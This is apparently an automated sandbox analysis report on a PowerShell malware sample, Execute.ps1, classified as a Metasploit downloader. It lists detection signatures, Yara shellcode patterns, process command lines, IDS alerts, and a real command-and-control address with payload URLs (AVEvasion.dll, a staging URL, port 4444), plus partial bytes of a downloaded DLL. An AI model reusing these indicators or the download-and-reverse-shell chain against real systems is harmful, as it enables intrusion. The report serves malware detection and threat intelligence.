Windows Analysis Report
Execute.ps1

Overview

General Information

Sample name: Execute.ps1
Analysis ID: 1591975
MD5: 4dcc2df2d674dab72c13fd4cd34097f8
SHA1: db114339bd7b17a6fc1041b565046d506b457725
SHA256: 37eb80a2bc8664f6f670015add9d235ba4d6f34450c6f48475e1679424b05a78
Tags: downloader, malware, ps1, user-Joker

Detection

Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Metasploit Payload
AI detected suspicious sample
Bypasses AMSI via dropped C# code
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious Malware Callback Communication
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 3648 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 348 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • cvtres.exe (PID: 3948 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES80CF.tmp" "c:\Users\user\AppData\Local\Temp\1ut2qrcn\CSCB06954D52E141279519B5296B9E4C4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
  • cleanup
{"Type": "Metasploit Download", "URL": "http://158.101.196.44/3Z4Nkumhl7F-GH8aHH-CfwIKMKqHgiASExjCc1WithmsUE0Mv6p-DMAk1ELFEyElo36nwNUveHgf_eBT_6eycCpPO7RK"}
Source | Rule | Description | Author | Strings
00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Metasploit_0f5a852d | Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. | unknown
    • 0x10c:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown
    • 0xb2:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
Process Memory Space: powershell.exe PID: 3648 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
    • 0x100035:$b2: ::FromBase64String(
    • 0x28eb5:$s1: -join
    • 0x35f8a:$s1: -join
    • 0x3935c:$s1: -join
    • 0x39a0e:$s1: -join
    • 0x3b4ff:$s1: -join
    • 0x3d705:$s1: -join
    • 0x3df2c:$s1: -join
    • 0x3e79c:$s1: -join
    • 0x3eed7:$s1: -join
    • 0x3ef09:$s1: -join
    • 0x3ef51:$s1: -join
    • 0x3ef70:$s1: -join
    • 0x3f7c0:$s1: -join
    • 0x3f93c:$s1: -join
    • 0x3f9b4:$s1: -join
    • 0x3fa47:$s1: -join
    • 0x3fcad:$s1: -join
    • 0x41e43:$s1: -join
    • 0x5088d:$s1: -join
    • 0x65fd5:$s1: -join

    System Summary

    Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 158.101.196.44, DestinationIsIpv6: false, DestinationPort: 4444, EventID: 3, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Initiated: true, ProcessId: 3648, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49705
    Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1", ProcessId: 3648, ProcessName: powershell.exe
    Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3648, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline", ProcessId: 348, ProcessName: csc.exe
    Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3648, TargetFilename: C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline
    Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1", ProcessId: 3648, ProcessName: powershell.exe

    Data Obfuscation

    Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3648, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline", ProcessId: 348, ProcessName: csc.exe
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-01-15T16:02:23.237129+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49705 | 158.101.196.44 | 4444 | TCP
    2025-01-15T16:02:31.551525+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49708 | 158.101.196.44 | 4444 | TCP
    2025-01-15T16:02:39.785833+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49715 | 158.101.196.44 | 4444 | TCP
    2025-01-15T16:02:48.103350+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49718 | 158.101.196.44 | 4444 | TCP
    2025-01-15T16:02:56.397561+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49721 | 158.101.196.44 | 4444 | TCP
    2025-01-15T16:03:04.668695+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49724 | 158.101.196.44 | 4444 | TCP
    2025-01-15T16:03:12.958618+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49727 | 158.101.196.44 | 4444 | TCP
    2025-01-15T16:03:21.394361+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49731 | 158.101.196.44 | 4444 | TCP
    2025-01-15T16:03:29.647376+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49734 | 158.101.196.44 | 4444 | TCP
    2025-01-15T16:03:37.912504+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49773 | 158.101.196.44 | 4444 | TCP
    2025-01-15T16:02:20.944034+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49704 | 158.101.196.44 | 80 | TCP
    2025-01-15T16:02:20.944056+0100 | 1810003 | 2 | Potentially Bad Traffic | 158.101.196.44 | 80 | 192.168.2.8 | 49704 | TCP
    2025-01-15T16:02:20.623250+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49704 | 158.101.196.44 | 80 | TCP

    AV Detection

    Source: http://158.101.196.44/AVEvasion.dll | Avira URL Cloud: Label: malware
    Source: http://158.101.196.44/random.txt | Avira URL Cloud: Label: malware
    Source: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Metasploit {"Type": "Metasploit Download", "URL": "http://158.101.196.44/3Z4Nkumhl7F-GH8aHH-CfwIKMKqHgiASExjCc1WithmsUE0Mv6p-DMAk1ELFEyElo36nwNUveHgf_eBT_6eycCpPO7RK"}
    Source: Execute.ps1 | Virustotal: Detection: 33%
    Source: Execute.ps1 | ReversingLabs: Detection: 13%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.dll | Joe Sandbox ML: detected
    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.pdb source: powershell.exe, 00000000.00000002.2357981222.000001B112276000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.pdbhP source: powershell.exe, 00000000.00000002.2357981222.000001B112276000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\justs\source\repos\avevasion\AVEvasion\obj\Release\net48\AVEvasion.pdb source: powershell.exe, 00000000.00000002.2380893802.000001B129860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B1127A4000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\justs\source\repos\avevasion\AVEvasion\obj\Release\net48\AVEvasion.pdbSHA256 source: powershell.exe, 00000000.00000002.2380893802.000001B129860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B1127A4000.00000004.00000800.00020000.00000000.sdmp
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft

    Networking

    Source: Malware configuration extractor | URLs: http://158.101.196.44/3Z4Nkumhl7F-GH8aHH-CfwIKMKqHgiASExjCc1WithmsUE0Mv6p-DMAk1ELFEyElo36nwNUveHgf_eBT_6eycCpPO7RK
    Source: global traffic | TCP traffic: 192.168.2.8:49705 -> 158.101.196.44:4444
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Jan 2025 15:02:20 GMTServer: Apache/2.4.6 ()Last-Modified: Sun, 11 Dec 2022 17:20:04 GMTETag: "1600-5ef9098fc4e22"Accept-Ranges: bytesContent-Length: 5632Content-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cd 89 29 e2 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 0e 00 00 00 06 00 00 00 00 00 00 9a 2c 00 00 00 20 00 00 00 40 00 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 47 2c 00 00 4f 00 00 00 00 40 00 00 1c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 0c 00 00 00 64 2b 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 0c 00 00 00 20 00 00 00 0e 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 1c 03 00 00 00 40 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 00 00 00 02 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7b 2c 00 00 00 00 00 00 48 00 00 00 02 00 05 00 80 21 00 00 e4 09 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 25 00 00 00 01 00 00 11 02 0a 16 0b 2b 17 06 07 02 07 91 20 aa 00 00 00 61 20 ff 00 00 00 5f d2 9c 07 17 58 0b 07 02 8e 69 32 e3 06 2a 00 00 00 13 30 06 00 aa 00 00 00 02 00 00 11 28 05 00 00 06 7e 0c 00 00 0a 20 00 10 00 00 7e 03 00 00 04 7e 02 00 00 04 16 28 04 00 00 06 26 02 18 8d 10 00 00 01 25 16 1f 20 9d 25 17 1f 2c 9d 17 6f 0d 00 00 0a 7e 05 00 00 04 25 2d 17 26 7e 04 00 00 04 fe 06 0d 00 00 06 73 0e 00 00 0a 25 80 05 00 00 04 28 01 00 00 2b 28 02 00 00 2b 0a 06 28 07 00 00 06 0a 7e 0c 00 00 0a 06 8e 69 7e 01 00 00 04 7e 02 00 00 04 28 01 00 00 06 0b 06 16 07 06 8e 69 28 11 00 00 0a 7e 0c 00 00 0a 16 07 7e 0c 00 00 0a 16 7e 0c 00 00 0a 28 02 00 00 06 15 28 03 00 00 06 26 2a 1e 02 28 12 00 00 0a 2a 72 20 00 10 00 00 80 01 00 00 04 1f 40 80 02 00 00 04 20 00 30 00 00 80 03 00 00 04 2a 2e 73 0c 00 00 06 80 04 00 00 04 2a 1e 02 28 12 00 00 0a 2a 26 03 1f 10 28 13 00 00 0a 2a 00 00 00 42 53 4a 42 01 00 01 00 00 00 00 00 0c 00 00 00 76 34 2e 30 2e 33
    Source: global traffic | HTTP traffic detected: GET /AVEvasion.dll HTTP/1.1 | Host: 158.101.196.44
    Source: Joe Sandbox View | ASN Name: ORACLE-BMC-31898US ORACLE-BMC-31898US
    Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49724 -> 158.101.196.44:4444
    Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49718 -> 158.101.196.44:4444
    Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49727 -> 158.101.196.44:4444
    Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49715 -> 158.101.196.44:4444
    Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49721 -> 158.101.196.44:4444
    Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49708 -> 158.101.196.44:4444
    Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49734 -> 158.101.196.44:4444
    Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49731 -> 158.101.196.44:4444
    Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49705 -> 158.101.196.44:4444
    Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49773 -> 158.101.196.44:4444
    Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.8:49704 -> 158.101.196.44:80
    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49704 -> 158.101.196.44:80
    Source: Network traffic | Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 158.101.196.44:80 -> 192.168.2.8:49704
    Source: global traffic | HTTP traffic detected: GET /random.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 158.101.196.44 | Connection: Keep-Alive
    Source: unknown | TCP traffic detected without corresponding DNS query: 158.101.196.44 (this entry is listed 50 times in the report)
    Source: global traffic | HTTP traffic detected: GET /random.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 158.101.196.44 | Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /AVEvasion.dll HTTP/1.1 | Host: 158.101.196.44
    Source: powershell.exe, 00000000.00000002.2357981222.000001B112276000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B1127A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://158.101.196.44
    Source: powershell.exe, 00000000.00000002.2357981222.000001B111252000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B1127A4000.00000004.00000800.00020000.00000000.sdmp, Execute.ps1 | String found in binary or memory: http://158.101.196.44/AVEvasion.dll
    Source: powershell.exe, 00000000.00000002.2357981222.000001B112276000.00000004.00000800.00020000.00000000.sdmp, Execute.ps1 | String found in binary or memory: http://158.101.196.44/random.txt
    Source: powershell.exe, 00000000.00000002.2374757249.000001B1211D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B112A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2374757249.000001B121092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000000.00000002.2357981222.000001B111252000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000000.00000002.2357981222.000001B111021000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000000.00000002.2357981222.000001B111252000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000000.00000002.2379335925.000001B129484000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://158.101.196.44/
    Source: powershell.exe, 00000000.00000002.2379335925.000001B129484000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://158.101.196.44/)
    Source: powershell.exe, 00000000.00000002.2379335925.000001B1293C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://158.101.196.44:4444/
    Source: powershell.exe, 00000000.00000002.2379335925.000001B129451000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2379335925.000001B129497000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://158.101.196.44:4444/3Z4Nkumhl7F-GH8aHH-CfwIKMKqHgiASExjCc1WithmsUE0Mv6p-DMAk1ELFEyElo36nwNUv
    Source: powershell.exe, 00000000.00000002.2379335925.000001B1293C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://158.101.196.44:4444/g
    Source: powershell.exe, 00000000.00000002.2357981222.000001B111021000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000000.00000002.2374757249.000001B121092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000000.00000002.2374757249.000001B121092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000000.00000002.2374757249.000001B121092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000000.00000002.2357981222.000001B111252000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000000.00000002.2357981222.000001B112276000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
    Source: powershell.exe, 00000000.00000002.2374757249.000001B1211D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B112A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2374757249.000001B121092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

    System Summary

    barindex
    Source: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
    Source: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
    Source: Process Memory Space: powershell.exe PID: 3648, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001B129B101070_2_000001B129B10107
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4AE598A80_2_00007FFB4AE598A8
    Source: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
    Source: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
    Source: Process Memory Space: powershell.exe PID: 3648, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: classification engineClassification label: mal100.troj.expl.evad.winPS1@6/12@0/1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fflvr5hx.4w4.ps1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: Execute.ps1Virustotal: Detection: 33%
    Source: Execute.ps1ReversingLabs: Detection: 13%
    Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline"
